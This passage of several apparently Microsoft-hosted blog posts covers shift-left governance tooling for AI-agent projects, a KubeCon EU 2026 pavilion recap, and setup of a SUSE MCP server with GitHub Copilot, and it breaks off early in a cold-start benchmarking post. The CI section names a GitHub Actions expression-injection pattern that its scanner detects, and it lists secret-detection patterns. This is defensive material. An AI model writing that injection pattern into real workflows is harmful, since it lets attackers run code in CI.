That post focused on what happens when an agent acts: policy evaluation at the moment a tool call fires, trust scoring when agents communicate, audit logging when decisions are made. Runtime governance is essential. But it is the last line of defense.

After that post went live, a pattern emerged in conversations with teams adopting AGT. The same question kept coming up: runtime checks are useful, but what about everything before production? We realized runtime governance was only half the story. So we went back and built tooling for every stage of your software development lifecycle, from the moment a developer saves a file to the moment an artifact ships to users.

Why Runtime Governance Is Not Enough

AI agents are a new class of workload. They reason about what to do, select tools, call APIs, read databases, and spawn sub-processes, often in loops that run without direct human oversight. The OWASP Agentic AI Top 10 (published December 2025) identifies risks like excessive agency, insecure tool use, privilege escalation, and supply chain compromise. These risks span the entire lifecycle, not just runtime.

Consider a few scenarios that runtime governance alone cannot prevent:

A developer commits a policy YAML file with a typo that silently disables all deny rules. The agent runs unprotected until someone notices.
A dependency update introduces a package with a known critical CVE. The agent starts using a vulnerable library before any security team reviews it.
A contributor adds a raw cryptographic import to an application module, bypassing the security-audited signing library. The code compiles and ships.
A GitHub Actions workflow uses an expression injection pattern that allows an attacker to execute arbitrary code in CI.
A release ships without a Software Bill of Materials (SBOM), making it impossible to trace which components are affected when the next log4j-style vulnerability drops.

Each of these is a governance failure, but none of them happens at runtime. They happen at commit time, at PR review time, at build time, or at release time. A comprehensive governance strategy needs coverage at every stage.

Four Stages of Pre-Runtime Governance

Governance violations can enter a codebase at four distinct stages of the development lifecycle. Each stage has a different class of risk, and each needs a different kind of check:

Stage	When It Runs	What It Catches	AGT Tooling
Commit-time	Before code leaves the developer machine	Malformed policies, schema violations, secrets, stub code, unauthorized crypto	Pre-commit hooks, quality gates
PR-time	When a pull request is opened or updated	Vulnerable dependencies, missing attestation, secrets in history, unpinned versions	GitHub Actions (attestation, dependency review, secret scanning, supply chain checks)
CI/Build-time	On every push and pull request to main	Compliance violations, binary security issues, dependency confusion, workflow injection	Governance Verify action, Security Scan action, CodeQL, BinSkim, policy validation
Release-time	Before artifacts are published	Missing provenance, unsigned artifacts, incomplete SBOMs	SBOM generation, Sigstore signing, build attestation, OpenSSF Scorecard

Just as with bugs, the earlier you catch a governance violation, the cheaper it is to fix. A malformed policy file caught at commit time costs zero CI minutes. A secret caught in PR review never reaches the default branch. A dependency confusion attack blocked in CI never reaches production. An unsigned artifact blocked at release time never reaches users.

Stage 1: Commit-Time Governance with Pre-Commit Hooks

The fastest governance feedback loop is local. Within the AGT project, we’ve implemented three pre-commit hooks that run automatically whenever a developer stages files for commit, validating governance artifacts before they ever leave the developer's machine.

Built-In Hooks

The toolkit's .pre-commit-hooks.yaml defines three hooks that any repository can adopt:

Hook ID	What It Validates	File Pattern
validate-policy	YAML/JSON policy files against the AGT policy schema, checking for required fields, valid operators, and structural correctness	Files matching polic.yaml, polic.yml, polic.json
validate-plugin-manifest	Plugin manifest files for required fields and schema compliance	Files matching plugin.json, plugin.yaml, plugin.yml
evaluate-plugin-policy	Plugin manifests against a governance policy file, evaluating whether the plugin would be allowed under the organization's rules	Files matching plugin.json, plugin.yaml, plugin.yml

To adopt these hooks, add AGT as a pre-commit hook source:

# .pre-commit-config.yaml repos: - repo: https://github.com/microsoft/agent-governance-toolkit rev: main # pin to a release tag in production hooks: - id: validate-policy - id: validate-plugin-manifest - id: evaluate-plugin-policy args: ['--policy', 'policies/marketplace-policy.yaml']

Then install and run:

pip install pre-commit pre-commit install pre-commit run --all-files

Extended Quality Gates

Beyond schema validation, we built a pre-commit rollout template (see the full example in the repository) with additional governance-specific quality gates designed to help prevent common security anti-patterns from entering the codebase:

Policy validation (agt-validate): Runs the full AGT policy CLI in strict mode, catching not just schema errors but semantic issues like conflicting rules.
Health check (agt-doctor): Runs on pre-push (before code leaves the machine entirely), performing a broader health check of the governance configuration.
Plugin metadata check (agency-json-required): Ensures every plugin directory contains the required agency.json metadata file.
Stub detection (no-stubs): Blocks TODO, FIXME, HACK, and raise NotImplementedError markers in staged production code. Test files are excluded.
Unauthorized crypto detection (no-custom-crypto): Blocks raw cryptographic imports (hashlib, hmac, crypto.subtle, System.Security.Cryptography, ring, ed25519-dalek) outside designated security modules. This helps ensure all cryptographic operations go through the audited AGT signing libraries.
Secret scanning (detect-secrets): Integrates Yelp's detect-secrets for pattern-based secret detection on every commit.

Phased Rollout for Teams

Adopting pre-commit hooks across a team requires a thoughtful rollout. The AGT documentation includes a phased adoption guide:

Week 1: Install hooks in permissive mode. Hooks warn on violations but do not block the commit. This lets developers see what would be caught without disrupting workflow.
Week 2: Switch to strict mode for policy validation only. Policy files must pass schema validation to be committed.
Week 3: Enable all hooks as blocking. Stubs, unauthorized crypto, and secrets are now blocked at commit time.
Week 4: Graduate to full blocking mode and remove the permissive fallback.

This approach helps teams build confidence in the governance tooling before it becomes a hard gate.

Stage 2: PR-Time Gates

Pre-commit hooks catch issues on the developer's machine, but they can be bypassed (force push, direct GitHub edits, hooks not installed). PR-time gates provide the second layer of defense, running in GitHub Actions on every pull request before merge is allowed.

Governance Attestation

The Governance Attestation action validates that PR authors have completed a structured attestation checklist before their code can merge. The default checklist covers seven sections:

Security review
Privacy review
Legal review
Responsible AI review
Accessibility review
Release Readiness / Safe Deployment
Org-specific Launch Gates

The action is fully configurable. Organizations can customize the required sections, set a minimum PR body length, and choose their own attestation format. Outputs include the validation status, a list of errors for missing sections, and a JSON mapping of sections to checkbox counts.

Here is an example workflow:

# .github/workflows/pr-governance.yml name: PR Governance on: pull_request: types: [opened, edited, synchronize] jobs: attestation: runs-on: ubuntu-latest steps: - uses: microsoft/agent-governance-toolkit/action/governance-attestation@main with: required-sections: | 1) Security review 2) Privacy review 3) Responsible AI review

Dependency Review

The dependency review workflow helps block PRs that introduce dependencies with known CVEs or disallowed licenses. It uses the GitHub dependency-review-action with a curated license allowlist:

- uses: actions/dependency-review-action@v4 with: fail-on-severity: moderate comment-summary-in-pr: always allow-licenses: > MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause, ISC, PSF-2.0, Python-2.0, 0BSD, Unlicense, CC0-1.0, CC-BY-4.0, Zlib, BSL-1.0, MPL-2.0

This runs on every PR that touches dependency manifests (package.json, Cargo.toml, pyproject.toml, requirements.txt). Dependencies with moderate or higher CVEs are flagged, and dependencies with licenses not on the allowlist are blocked.

Secret Scanning

The secret scanning workflow runs on every PR to the main branch and on a weekly schedule. It combines two complementary approaches:

Gitleaks: Pattern-based secret detection across the full git history, catching API keys, tokens, and credentials that may have been committed at any point.
High-entropy string scanning: Regex-based detection of common secret patterns including GitHub tokens (ghp_, gho_), AWS access keys (AKIA), Slack tokens (xox), and base64-encoded strings with high entropy.

Supply Chain Integrity

A dedicated supply chain check workflow triggers when dependency manifest files change. It enforces two rules that help prevent supply chain attacks:

Exact version pinning: No ^ or ~ version ranges in package.json files. This prevents unexpected minor/patch version updates that could introduce compromised code.
Lockfile presence: Every package directory with dependencies must have a corresponding lockfile (package-lock.json, pnpm-lock.yaml, or yarn.lock). Lockfiles help ensure reproducible builds with verified integrity hashes.

Quality Gates

The quality gates workflow mirrors the pre-commit hooks at the PR level, providing defense in depth. It runs four checks on every pull request:

Gate	Purpose
No Stubs/TODOs	Blocks TODO, FIXME, HACK markers in production code (test files excluded)
No Unauthorized Crypto	Blocks raw cryptographic imports outside designated security modules
Security Audit Required	Changes to security-sensitive paths require accompanying audit documentation
Dependency Audit Trail	Vendored patches must have an audit trail explaining the patch and its provenance

These gates catch anything that bypasses pre-commit hooks: force-pushed commits, direct GitHub web edits, commits from contributors who have not installed the hooks.

Stage 3: CI/Build-Time Governance

Once a PR passes the gate workflows, the main CI pipeline and specialized workflows perform deeper, more computationally intensive analysis.

The Governance Verify Action

The Governance Verify action is the primary CI-time governance check. It is a GitHub Actions composite action that installs the toolkit and runs the compliance CLI against your repository. It supports four modes:

Command	What It Does
governance-verify	Runs the full compliance verification suite, checking governance controls and reporting how many pass
marketplace-verify	Validates a plugin manifest against marketplace requirements (required fields, signing, metadata)
policy-evaluate	Evaluates a specific policy file against a JSON context, returning the allow/deny decision with the matched rule
all	Runs governance-verify, then marketplace-verify and policy-evaluate if the corresponding paths are provided

Here is an example:

# .github/workflows/governance-ci.yml name: Governance CI on: [push, pull_request] jobs: verify: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: microsoft/agent-governance-toolkit/action@main with: command: all policy-path: policies/ manifest-path: plugin.json output-format: json fail-on-warning: 'true'

The action outputs structured data including controls-passed, controls-total, violations count, and full command output in JSON format. This makes it straightforward to integrate with dashboards, Slack notifications, or downstream decision logic.

The Security Scan Action

A separate security scan action scans directories for secrets, CVEs, and dangerous code patterns. Unlike the PR-time secret scanning (which focuses on git history), this action performs deep content analysis of the current codebase:

- uses: microsoft/agent-governance-toolkit/action/security-scan@main with: paths: 'plugins/ scripts/' min-severity: high exemptions-file: .security-exemptions.json

The action supports configurable severity thresholds (critical, high, medium, low), an exemptions file for acknowledged findings, and structured JSON output with findings-count, blocking-count, and detailed findings.

Policy Validation Workflow

A dedicated policy validation workflow triggers whenever YAML files or the policy engine source code changes. It performs two jobs in sequence:

Validate policies: Discovers all policy files matching the *policy* naming convention, then validates each file using the AGT policy CLI.
Test policies: Runs the policy CLI unit tests to verify that policy evaluation behavior is correct after the changes.

This ensures that policy file edits do not break the policy engine and that policy semantics are preserved.

CodeQL and Static Analysis

AGT uses GitHub's CodeQL for semantic static analysis of Python and TypeScript code. The CodeQL workflow runs on pushes and PRs, performing deep dataflow analysis that goes beyond pattern matching. Results are uploaded as SARIF to GitHub's Security tab, providing a centralized view of code quality issues.

Dependency Confusion Scanning

A dedicated CI job runs a dependency confusion scanner on every build. This is a targeted defense against a specific supply chain attack vector where an attacker registers a public package with the same name as an internal package. The scanner checks that:

Internal package names do not collide with public PyPI or npm packages
Notebook pip install commands only reference packages that are registered and expected

Workflow Security Auditing

When GitHub Actions workflow files change, a workflow security job scans for common CI/CD security issues:

Expression injection: Detects patterns like ${{ github.event.pull_request.title }} used directly in run: blocks, which can allow arbitrary code execution.
Overly permissive permissions: Flags workflows that request more permissions than necessary.
Unpinned action references: Detects actions referenced by branch name instead of commit SHA, which is a supply chain risk.

.NET Binary Analysis with BinSkim

For the .NET SDK (Microsoft.AgentGovernance), the CI pipeline runs Microsoft BinSkim binary security analysis on compiled assemblies. BinSkim checks for security-relevant compiler and linker settings in compiled binaries, such as DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), and stack protection. Results are uploaded as SARIF to GitHub code scanning alongside the CodeQL results.

The ci-complete Gate Pattern

With many CI jobs that conditionally run based on path filters, AGT uses a pattern called ci-complete: a single gate job that is configured as the sole required status check in branch protection. This job runs unconditionally (if: always()), depends on all other CI jobs, and checks that none of them failed. Jobs that were skipped (because no relevant files changed) are acceptable. This pattern ensures that branch protection works correctly with conditional CI jobs, preventing the common issue where skipped jobs report as "skipped" and fail required status checks.

Language-Specific Compile-Time Enforcement

Beyond the language-agnostic CI checks, each AGT SDK uses its language's native compiler and tooling to enforce governance standards at compile time.

.NET: The Strictest Compile-Time Checks

The .NET SDK (Microsoft.AgentGovernance) enforces compile-time governance through MSBuild properties in Directory.Build.props and Directory.Build.targets, which apply automatically to every project in the SDK:

Feature	MSBuild Property	Effect
Nullable reference types	<Nullable>enable</Nullable>	The compiler warns on every possible null dereference, helping prevent NullReferenceException at compile time
Warnings as errors	<TreatWarningsAsErrors>true	All compiler warnings become build errors for packable projects; no warnings can be shipped to consumers
Strong-name signing	<SignAssembly>true</SignAssembly>	Assemblies are signed with a strong-name key (AgentGovernance.snk), enabling identity verification
Deterministic builds	<ContinuousIntegrationBuild>true	Identical source code produces bit-for-bit identical binaries in CI, enabling build verification
SourceLink	Microsoft.SourceLink.GitHub package	Users can step into AGT source code when debugging, supporting transparency and auditability
Symbol packages	<IncludeSymbols>true</IncludeSymbols>	.snupkg symbol packages are published alongside NuGet packages for debugging support

TypeScript: Strict Compilation and Linting

The TypeScript SDK (@microsoft/agentmesh-sdk) uses strict compiler settings and ESLint for build-time governance:

Strict mode ("strict": true in tsconfig.json) enables all strict type-checking options, including noImplicitAny, strictNullChecks, strictFunctionTypes, and strictBindCallApply.
Consistent file naming (forceConsistentCasingInFileNames) prevents cross-platform issues where imports work on case-insensitive file systems (Windows, macOS) but fail on case-sensitive ones (Linux CI).
Declaration generation (declaration: true with declarationMap: true) produces .d.ts files for consumers, enabling downstream type checking.
ESLint with @typescript-eslint provides static analysis during the build process, catching issues beyond what the TypeScript compiler checks.

Python: Type Safety and Fast Linting

Python packages in AGT use typed package markers and static analysis tooling configured in pyproject.toml:

py.typed marker: Each package includes a py.typed file, signalling to type checkers (mypy, pyright, Pylance) that the package supports type checking. Consumers get type errors if they misuse the AGT API.
mypy: Configured as a dev dependency with project-specific settings in pyproject.toml. Provides static type checking that catches type mismatches before runtime.
ruff: A fast Python linter written in Rust, configured in pyproject.toml and enforced in CI. Ruff checks for hundreds of code quality rules at build time.

Stage 4: Release-Time Gates

Before artifacts reach users, the release pipeline adds a final layer of verification. These gates help ensure that what ships is exactly what was built, is signed by the expected publisher, and has a complete inventory of its components.

Gate	Tool	What It Produces
SBOM generation	Anchore/Syft	SPDX and CycloneDX software bills of materials listing every component, dependency, and licence
Python signing	Sigstore	Cryptographic signature using OpenID Connect identity, verifiable without manual key distribution
.NET signing	RELEASE PIPELINE	Microsoft Authenticode and NuGet signing through the release pipeline
Build provenance	actions/attest-build-provenance	SLSA provenance attestation linking the artifact to its source commit and build environment
SBOM attestation	actions/attest-sbom	Binds the SBOM to the specific release artifact, creating a verifiable link between the inventory and the binary

Additionally, the OpenSSF Scorecard runs on schedule, providing an automated security posture assessment that covers branch protection, dependency management, CI/CD practices, and more. The score is published to the OpenSSF Scorecard website, giving consumers a transparent view of the project security practices.

How It All Fits Together: Defense in Depth

This approach follows a defense-in-depth principle: every check exists at multiple layers, so that bypassing one layer does not compromise the whole system.

Secret scanning, for example, runs at three levels: detect-secrets at commit time (pre-commit hook), Gitleaks at PR time (secret scanning workflow), and the Security Scan action at CI time (content analysis). A developer who bypasses pre-commit hooks will still be caught by the PR-time gate. A contributor who force-pushes past the PR gate will still be caught by the CI pipeline.

Similarly, policy validation runs at commit time (validate-policy hook), at PR time (quality gates), and at CI time (policy validation workflow). Each layer adds depth: the commit-time hook catches schema errors, the CI pipeline catches semantic issues and runs regression tests.

The ci-complete gate job ties everything together. By depending on every CI job and serving as the single required status check, it ensures that no code merges to the main branch unless every applicable check has passed.

Getting Started

You can adopt AGT's shift-left governance incrementally. Here are three starting points, from lowest to highest effort:

1. Add the Governance Verify Action (5 minutes)

Add a single GitHub Actions workflow that runs the compliance check on every PR:

# .github/workflows/governance.yml name: Governance on: [pull_request] jobs: verify: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: microsoft/agent-governance-toolkit/action@main with: command: governance-verify

2. Enable Pre-Commit Hooks (15 minutes)

Add a .pre-commit-config.yaml referencing AGT's hooks, install them, and run against all existing files to establish a baseline. Start in permissive mode and graduate to strict over four weeks.

3. Full Pipeline Integration (1-2 hours)

Add the complete set of PR-time gates (attestation, dependency review, secret scanning, supply chain checks, quality gates), configure the Security Scan action for your plugin directories, and enable SBOM generation and signing in your release workflow. The AGT repository itself serves as a reference implementation: every workflow described in this post is running in production at aka.ms/agent-governance-toolkit.

Important Notes

The policy files, workflow configurations, and code samples in this post are illustrative examples. Your organization's governance requirements may differ. Review and customize all configurations before deploying to production. The Agent Governance Toolkit is designed to help organizations implement governance controls for AI agents; it does not guarantee compliance with any specific regulatory framework. Always consult your organization's security and legal teams when defining governance policies.

What Comes Next

Pre-runtime governance is one piece of the puzzle. Combined with the runtime governance capabilities covered in part one of this series (policy engines, zero-trust identity, execution sandboxing, audit logging), it provides coverage across the full lifecycle.

The project continues to grow. Since the initial release, we’ve added a multi-stage policy pipeline (pre_input, pre_tool, post_tool, pre_output stages), approval workflows with human-in-the-loop gates, DLP attribute ratchets for monotonic session state, and OpenTelemetry instrumentation for governance operations. Over 45 step-by-step tutorials are available in the documentation.

Everything described in this post is available today in the public GitHub repository. The full source, documentation, tutorials, and examples are at aka.ms/agent-governance-toolkit, open source under the MIT license. We welcome contributions, feedback, and issue reports from the community.

Project Pavilion Presence at KubeCon EU 2026

lexinadolski — Tue, 28 Apr 2026 12:50:16 GMT

KubeCon + CloudNativeCon Europe 2026 took place from 23 to 26 March at RAI Amsterdam, and it was a strong one. The themes running through the week reflected where the cloud native community is right now: AI moving from experimentation into production, platform engineering continuing to mature, and security and sovereignty top of mind for organizations across Europe. Microsoft was there throughout, and once again supported a range of open source projects in the Project Pavilion.

The Project Pavilion is a dedicated, vendor-neutral space on the show floor reserved for CNCF projects. It is where the work gets talked about honestly. Maintainers and contributors meet directly with end users, share what they are building, get real feedback on what is and is not working, and have the kinds of technical conversations that are hard to have anywhere else. For open source communities, it is one of the most valuable parts of the event.

Why Our Presence Matters

Microsoft's products and services are built on and alongside many of the technologies represented in the pavilion, and the health of these communities matters to us directly. Showing up means our teams hear firsthand what is working, what is missing, and where these projects need to go next. It also means we get to contribute as community members, not just as a company name on a sponsor board. That distinction matters to us, and to the communities we are part of.

Microsoft-Supported Pavilion Projects

Confidential Containers

Representative: Jeremi Piotrowski

The Confidential Containers booth gave attendees a chance to learn more about the project and its approach to protecting workloads using hardware-based trusted execution environments. Jeremi was on hand throughout the kiosk hours, fielding questions from interested users and developers exploring confidential computing in Kubernetes environments. Conversations touched on use cases around data privacy, regulated workloads, and the role Confidential Containers plays in the broader cloud-native security landscape.

Drasi

Representative: Daniel Gerlag and Nandita Valsan

The Drasi team had a busy time in the pavilion, engaging around 40 attendees across two kiosk shifts in focused technical conversations. Most visitors were developers and platform engineers curious about change-driven architectures and real-time data processing. There was strong positive feedback on the newly introduced Drasi Server modes and embeddable library, which complement Drasi for Kubernetes. The team came away with useful validation of current design decisions and good input for the roadmap ahead.

Envoy

Representative: Mikhail Krinkin

The Envoy booth was staffed for the full duration of KubeCon EU by maintainers from Microsoft, Google, Isovalent, and Tetrate, reflecting the broad and healthy contributor base behind the project. The biggest topic at the booth was migration from ingress-nginx to Gateway API implementations. The archival of ingress-nginx pushed a lot of users into making changes they were not quite ready for, and questions ranged from technical specifics like HTTP default differences between Envoy and Nginx, to more foundational questions about what Envoy and Gateway API actually are. The team had anticipated this and invested in the ingress2gateway project to give users a clear migration path. Extensibility was another frequent conversation topic, with dynamic modules increasingly becoming the go-to answer for user-specific requirements. Starting with the 1.38 release of Envoy, dynamic modules will have a backward compatible ABI, a sign of real production readiness for that feature.

Flatcar

Representative: Thilo Fromm and Mathieu Tortuyaux

The Flatcar booth had great energy, with maintainers from Microsoft, STACKIT, and CloudBase joining for conversations throughout the pavilion hours. Operational sovereignty came up again and again as a theme, with users and consulting partners sharing how they are building their Kubernetes offerings on Flatcar because of how reliable and secure it is.

There were a lot of meaningful conversations. Lambda.ai currently runs Flatcar on their control plane and is looking at extending it to worker and customer clusters, with interest in contributing to the project. ReeVo has built their hosted Kubernetes distro on Flatcar across multi-cloud and bare metal environments and is planning to move hundreds of customer clusters over soon. Users from ClearScore, Avassa, Recorded Future, and several other organizations also stopped by with positive feedback on the project's robustness and security. STACKIT uses Flatcar as the default OS for their hosted Kubernetes offering and sponsors a full-time maintainer for the project. The team also connected with TAG Infrastructure to talk through Flatcar's CNCF graduation progress.

Headlamp

Representatives: René Dudfield and Santhosh Nagaraj S

The Headlamp booth was a busy one, with users, contributors, and partner projects all stopping by throughout the pavilion hours. Conversations covered real-world deployments, federation challenges, multi-tenant namespace visibility, and feature requests like multi-CR data aggregation. There was notable interest from consultancies deploying Headlamp across hundreds of customer clusters, as well as from companies already running it at cloud scale. Several CNCF projects expressed interest in building UIs for their own projects inside Headlamp, with a few even getting started right there at the conference. The team also heard from users getting budget approved to migrate from the deprecated Kubernetes Dashboard, which is a good sign for the project's growing momentum. Demand for air-gapped AI agent support and deeper Azure and AKS integrations for internal developer platforms came up as clear areas to watch.

Hyperlight

Representative: Ralph Squillace

The Hyperlight booth ran as a half-day session on Tuesday, in line with the project's current Sandbox status, but the corner location in the project area made a real difference in visibility. Ralph was fielding questions from the moment the doors opened, with a steady stream of visitors right up until the shift ended. Live and recorded demos were central to the conversations, helping attendees quickly grasp what Hyperlight does and how it fits into their environments. One standout visit came from an engineer at SAP who spent nearly an hour at the booth, pushing the conversation from fundamentals and embedding examples all the way through to agentic protection scenarios in Kubernetes. That conversation continued beyond KubeCon and turned into a scheduled meeting to explore a proof of concept, a good example of the kind of follow-on engagement the pavilion can generate.

Inspektor Gadget

Representative: Michael Friese and Qasim Sarfraz

The Inspektor Gadget booth had a lot of great energy, drawing in contributors, new users, and people just discovering the project for the first time. There was genuine excitement around Inspektor Gadget Desktop and its visual troubleshooting experience for Kubernetes and Linux environments. The integration with HolmesGPT, which was also featured in the keynote, came up frequently and was one of the main talking points throughout the event. A theme that surfaced consistently in conversations with platform engineers was multi-tenancy, with teams looking for ways to safely give developers ad-hoc access to troubleshoot issues independently while keeping overall control at the platform level. It was a good set of conversations that reflected both the project's maturity and the growing demand for a flexible observability framework.

Istio

Representative: Mitch Connors, Mikhail Krinkin, Jackie Maertens and Mike Morris

The Istio booth had steady traffic throughout the conference, with a noticeable shift in who was stopping by. More visitors came from teams with existing sidecar-based production deployments looking for guidance on moving to ambient mode, which is a change from previous years when ambient interest was mostly coming from greenfield users. The motivation to make the move was often tied to cost optimization and performance, with teams having read case studies and feeling more confident about the direction. That said, the increased interest also surfaced some real gaps, including requests for clearer migration guidance, more clarity around architectural differences like mTLS egress workflows, and better support for VM-based workloads. The team is planning to prioritize migration guidance over the coming months. The updated Istio Day format, with a half day of sessions at the Cloud Native Theater stage, also drew a strong crowd with standing room only throughout.

Notary Project

Representative: Toddy Mladenov and Flora Taagen

The Notary Project kiosk drew a wide range of visitors, from people learning about container image signing for the first time to experienced engineers asking detailed questions about what is coming next on the roadmap. A major highlight of the week was the project's conference talk on per-layer dm-verity signing, which drew a packed room and over 660 online sign-ups, one of the stronger turnouts for a project-level session at the event. The talk walked through how the new capability moves container security beyond pull-time verification to continuous runtime protection, backed by dm-verity, which generated a lengthy Q&A and a lot of enthusiasm from the audience. The team also sees a real opportunity ahead as AI workloads push organizations to think harder about the integrity of models, datasets, and container images, and the interest at the booth reinforced that Notary Project is well positioned to play a big role in securing those workflows.

ORAS

Representative: Toddy Mladenov

The ORAS kiosk was staffed by maintainers from Microsoft, NVIDIA, and Red Hat, a good reflection of the healthy multi-vendor community the project has built. Attendees engaged with maintainers on ORAS use cases and adoption, with conversations ranging from how artifacts are tagged and packaged to how ORAS fits into broader multi-cloud workflows. One practical takeaway from maintainer conversations was around leveraging the ORAS SDK more often as a substitute for CLI operations when working with container registries, which helps teams build simpler and more robust tooling.

Radius

Representative: Sylvain Niles and Will Tsai

The Radius booth, supported by the Microsoft Azure Incubations team, attracted a good mix of enterprise platform teams, prospective adopters, and fellow open source maintainers throughout the pavilion hours. There was strong interest in the extensible Radius Resource Types feature and how it helps teams abstract infrastructure complexity and move workloads across different environments. Conversations also surfaced useful feedback on where the project should focus next, including agent-driven infrastructure workflows and using the Radius application graph to improve observability and operational visibility for cloud-native applications.

Conclusion

KubeCon EU 2026 was a good reminder of why this community continues to grow. The conversations in the Project Pavilion were substantive, the feedback was honest, and the connections made there will carry forward into the work. Microsoft will be back for KubeCon NA in Salt Lake City this November, and we are already looking forward to it.

If you are interested in getting involved with any of these projects, the best starting point is each project's community directly. You are also welcome to reach out to Lexi Nadolski at lexinadolski@microsoft.com with any questions.

Getting Started with the SUSE Multi-Linux Manager MCP Server and GitHub Copilot

abbottkarl — Wed, 22 Apr 2026 07:00:00 GMT

Enterprise Linux environments are heterogeneous. That's not a problem statement - it's just the truth. SUSE, Ubuntu, RHEL, and their downstream variants coexist in every data center I've seen, and increasingly across Azure subscriptions too. AI assistants like GitHub Copilot can already connect to these machines, run commands, troubleshoot issues, apply patches one box at a time. But if you're managing a fleet of hundreds or thousands of systems across distributions, the gap isn't whether AI can touch your infrastructure. It's whether it can work through the centralized management tooling where your inventory, patch orchestration, RBAC, and audit trails actually live.

SUSE just took a meaningful step to close that gap. Their Multi-Linux Manager MCP Server, built on the open source Uyuni project gives AI agents like GitHub Copilot a structured, authenticated interface to your existing management platform. Not the individual boxes. The management plane where your centralized inventory, CVE auditing, cross-distribution patch scheduling, and RBAC already live. Not a rip-and-replace. Not a new console to learn. A way to talk to the infrastructure management you've already built.

This post walks through what the MCP server does, why it matters in an Azure context, and how to get it wired up with GitHub Copilot so you can start working with it today.

The Model Context Protocol (MCP) is an open standard that defines how AI models connect to external tools and data sources. Think of it as the USB-C of AI integrations - a common interface so that different clients (GitHub Copilot, Claude Desktop, Gemini CLI) can talk to different servers (Azure, SUSE, databases, APIs) without bespoke glue code for every combination.

Why This Matters for Azure Customers

If you are running Linux workloads on Azure - whether for SAP, HPC, or traditional enterprise applications - the Multi-Linux Manager MCP server provides a conversational interface for your infrastructure without requiring you to change tools.

Management-plane depth, not just infrastructure inventory. Azure and Copilot already give you fleet-wide visibility into your VMs. The SUSE MCP server adds the layer underneath: patch scheduling state, erratum tracking, cross-distribution CVE audits, and system group management that lives in your Multi-Linux Manager instance.
A single pane of glass. Pair this with the Azure MCP Server and your AI assistant can move between Azure resource operations and OS-level fleet management in one conversation, across the distributions Multi-Linux Manager supports, without switching tools or contexts.

What You Can Actually Do With It

The MCP server exposes over 20 practical tools for day-to-day infrastructure operations. Instead of relying on a generic knowledge base, Copilot queries your actual infrastructure.

Inventory and Inspection: You can list active systems across your fleet or pull detailed event histories for specific machines.
Patch Management and CVE Response: Copilot can rapidly audit all systems for pending updates or identify specific machines vulnerable to a new CVE.
Operational Actions: You can list system groups, register new systems, or schedule server reboots.

The Security Model: Human-in-the-Loop

Letting an AI agent touch production infrastructure raises the obvious question: what keeps it from doing something destructive? SUSE has been deliberate about this by designing the MCP server with a default "human-in-the-loop" security model.

Read-Only by Default: The server ships with all write actions disabled (UYUNI_MCP_WRITE_TOOLS_ENABLED=false).
Explicit Confirmation: If you enable write tools, Copilot is required to ask for your explicit confirmation before executing state-changing actions like applying patches or scheduling reboots.
Enterprise Authentication: The server supports OAuth 2.0, ensuring the AI agent authenticates through your identity provider.
Layered Governance: Combined with Multi-Linux Manager’s role-based access control (RBAC) and the principle of least privilege for the service account, you get layered governance without bolting on a separate approval system.

AI-assisted operations that bypass human judgment won't get adopted in enterprises. AI-assisted operations that make the human faster while keeping them in control, that's the model that actually ships.

Architecture on Azure

Here's the topology we're working with:

SUSE Multi-Linux Manager - Running on an Azure VM, managing your Linux fleet across distributions. This is the control plane for your systems - inventory, patching, configuration. Available on Azure Marketplace.
MCP Server - Runs as a container (Docker/Podman), either locally alongside your dev environment or as a standalone HTTP service. The MCP Server container is available in SUSE Registry and is backed by a secure, trusted software supply chain.
GitHub Copilot - In VS Code or the CLI. Configured to use the MCP server as a tool source. Sends natural language requests, receives structured responses from your infrastructure.
Your Linux fleet on Azure - Whatever Multi-Linux Manager manages for you. The MCP server doesn't care about the distribution mix; that's the whole point of Multi-Linux Manager.

Getting Started: Step by Step

Prerequisites

A running SUSE Multi-Linux Manager instance managing your Linux estate
Docker or Podman installed on your workstation (for local deployment) or network access to a remote MCP server instance
GitHub Copilot with agent mode enabled (VS Code or CLI)

Step 1: Stand up the MCP Server

For local deployment, pull the container and point it at your Multi-Linux Manager instance following the project documentation. For remote/team deployments, your administrator can run the server as a standalone HTTP service with OAuth 2.0.

Step 2: Configure GitHub Copilot

In VS Code, open the Command Palette and type GitHub Copilot: Configure MCP Servers. Add your server to the config:

{
"mcpServers": {
"suse-multi-linux-manager": {
"type": "http",
"url": "https://your-mcp-server.example.com/mcp"
}
}
}

Step 3: Verify the Connection

Open GitHub Copilot and try a read-only query:

"List all active systems managed by my SUSE Multi-Linux Manager."

If your fleet inventory appears, you're connected.

Step 4: Start Operating

"Are any of my systems affected by CVE-2026-XXXX?"

"Show me all systems that have pending but unscheduled security patches."

"Which systems need a reboot?"

Getting Involved

The SUSE Multi-Linux Manager MCP server is open source under the Apache 2.0 license, built on the Uyuni project. The current v0.5 is a tech preview. Feedback goes to uyuni-project/uyuni#10562, bugs to GitHub Issues.

The gap in AI-assisted Linux operations was never whether AI could reach your infrastructure. It was whether it could work through the management tooling where your fleet-scale decisions actually get made. SUSE built the bridge to that layer. GitHub Copilot is the conversational interface. Your fleet is already there. Go connect them.

Dissecting LLM Container Cold-Start: Where the Time Actually Goes

robcronin — Mon, 27 Apr 2026 11:36:05 GMT

Dissecting LLM Container Cold-Start: Where the Time Actually Goes

Cold-start latency determines whether GPU clusters can scale to zero, how fast they can autoscale, and whether bursty or low-QPS workloads are economically viable. Most optimization effort targets the container pull path – faster registries, lazy-pull snapshotters, different compression formats. But “cold-start” is actually a composite of pull, runtime startup, and model initialization, and the dominant phase varies dramatically by inference engine. An optimization that cuts time-to-first-token for one engine can be irrelevant for another, even on identical infrastructure.

What we measured

We decomposed cold-start for two architecturally different engines – vLLM (Python/CUDA, heavy JIT compilation) and llama.cpp (C++, minimal runtime) – running Llama 3.1 8B on A100 GPUs. Every run starts from a completely clean slate: containerd stopped, all state wiped, kernel page caches dropped. No warm starts, no pre-pulling, no caching.

We break TTFT into three phases: pull (download + decompression + snapshot creation), startup (container start → server ready), and first inference (first API response, including model weight loading for engines that defer it). We tested across three snapshotters (overlayfs, EROFS, Nydus) with gzip and uncompressed images, pulling from same-region Azure Container Registry.

Setup

All experiments ran on an NVIDIA A100 80GB (Azure NC24ads_A100_v4), pulling from same-region Azure Container Registry. Images were built with AIKit, which produces ModelPack-compliant OCI artifacts with uncompressed model weight layers, Cosign signatures, SBOMs, and provenance attestations. These are supply chain properties you lose when model weights live on a shared drive.

vLLM: startup dominates, pull barely matters

